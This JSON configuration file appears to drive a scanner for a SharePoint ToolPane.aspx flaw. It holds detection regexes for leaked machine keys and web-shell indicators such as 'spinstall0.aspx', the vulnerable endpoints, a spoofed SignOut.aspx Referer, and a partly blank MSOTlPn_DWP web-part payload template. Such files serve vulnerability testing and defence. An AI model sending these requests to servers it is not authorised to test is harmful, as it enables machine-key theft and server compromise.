{ "detection_rules": { "critical_patterns": [ { "name": "machine_key_extraction", "pattern": "[A-F0-9]{128,256}\\|[A-Z0-9]+\\|[A-F0-9]{48,96}\\|[A-Z0-9]+\\|Framework[0-9A-Z]+", "score": 95, "description": "Full machine key extraction response detected", "case_insensitive": true }, { "name": "pipe_delimited_keys", "pattern": "[A-F0-9]{64,}\\|[A-Z0-9_]+\\|[A-F0-9]{32,}\\|[A-Z0-9_]+\\|Framework", "score": 90, "description": "Pipe-delimited machine key data pattern", "case_insensitive": true } ], "high_patterns": [ { "name": "secondary_payload", "patterns": ["spinstall0.aspx", "Page_load()", "System.Web.Configuration.MachineKeySection", "GetApplicationConfig"], "score": 15, "description": "Secondary payload indicators" }, { "name": "validation_key", "pattern": "[A-F0-9]{128,256}", "score": 30, "description": "Validation key pattern detected" }, { "name": "decryption_key", "pattern": "[A-F0-9]{48,96}", "score": 25, "description": "Decryption key pattern detected" } ], "medium_patterns": [ { "name": "sharepoint_components", "patterns": ["Scorecard", "ExcelDataSet"], "score": 25, "description": "SharePoint vulnerable components" }, { "name": "framework_patterns", "pattern": "Framework(20SP1|45|40)", "score": 10, "description": "Framework compatibility indicators", "case_insensitive": true } ], "low_patterns": [ { "name": "error_patterns", "patterns": ["Microsoft.PerformancePoint.Scorecards", "System.Runtime.Serialization", "CompressedDataTable", "ToolPane processing error", "System.Web.UI.LosFormatter", "ObjectDataProvider"], "score": 8, "description": "SharePoint component error patterns" } ] }, "confidence_thresholds": { "critical": 85, "high": 75, "medium": 60, "low": 50 }, "scan_settings": { "default_timeout": 10, "default_threads": 10, "max_retries": 3, "backoff_factor": 1, "user_agents": [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" ], "ssl_verification": true, "verify_certificates": true }, "endpoints": [ "/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx", "/_layouts/16/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx" ], "payload_config": { "MSOTlPn_Uri": "https://{host}/_controltemplates/15/AclEditor.ascx", "MSOTlPn_DWP": "\n <%@ Register Tagprefix=\"Scorecard\" Namespace=\"Microsoft.PerformancePoint.Scorecards\" Assembly=\"Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <%@ Register Tagprefix=\"asp\" Namespace=\"System.Web.UI\" Assembly=\"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" %>\n\n \n \n
\n \n
\n \n \n " }, "request_headers": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0", "Content-Type": "application/x-www-form-urlencoded", "Referer": "/_layouts/SignOut.aspx", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive" }, "rate_limiting": { "enabled": true, "requests_per_second": 10, "burst_size": 20, "adaptive": true }, "caching": { "enabled": true, "cache_duration_seconds": 3600, "cache_file": "scan_cache.json" }, "metrics": { "enabled": true, "track_performance": true, "track_accuracy": true } }